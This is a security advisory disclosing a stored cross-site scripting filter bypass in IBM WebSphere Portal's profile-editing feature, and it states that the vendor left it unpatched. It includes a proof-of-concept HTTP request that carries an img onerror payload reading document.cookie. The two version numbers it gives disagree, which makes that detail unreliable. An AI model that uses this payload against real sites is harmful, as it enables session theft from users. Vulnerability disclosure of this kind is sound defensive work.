SSD Advisory – IBM WebSphere Portal Cross-Site Scripting (XSS)
The following advisory describes a Cross-Site Scripting (XSS) vulnerability found in WebSphere Portal version 18.104.22.168.
IBM WebSphere Portal products provide enterprise web portals that help companies deliver a highly-personalized, social experience for their customers. WebSphere Portal products give users a single point of access to the applications, services, information and social connections they need. These products help increase visitor response and reduce web operations cost while offering a range of capabilities to meet your business needs.
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
We notified IBM of the vulnerability back in September 2016, repeated attempts to re-establish contact and get some answer on the status of the patches for this vulnerability went unanswered. At this time there is no solution or workaround for this vulnerability.
IBM WebSphere Portal version 22.214.171.124 suffers from an input validation issue resulting in the bypass of the built-in anti Cross-Site Scripting (XSS) mechanism, which is implemented to filter potentially malicious HTML tags while updating user’s profile detail. The identified vulnerability allows malicious users to perform stored XSS attacks in order to steal session cookie’s token or perform CSRF attacks.
Proof of Concept
POST /profiles/ajax/editMyProfile.do?lang=en_us HTTP/1.1 Host: 192.168.1.200 User-Agent: Mozilla/5.0 (xxxx) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://192.168.1.200/profiles/html/editMyProfileView.do?tab=aboutMe&lang=en_us Content-Length: 258 Cookie: *cookies here* Connection: keep-alive Cache-Control: no-cache dangerousurlnonce=cdcdccd-3333-2222-1111-000000000000&subEditForm=aboutMe&attribute(description)=%3Cp%20dir%3D%22ltr%22%3E%0A%09%3Cstrong%3EAAAAA%3C%2Fstrong%3E%3C%2Fp%3E%0A&attribute(experience)=<img%20src=x%20xxxx%20onerror="alert(document.cookie)"%2f%2f%
<img src=x xxxx onerror="alert(document.cookie)"//%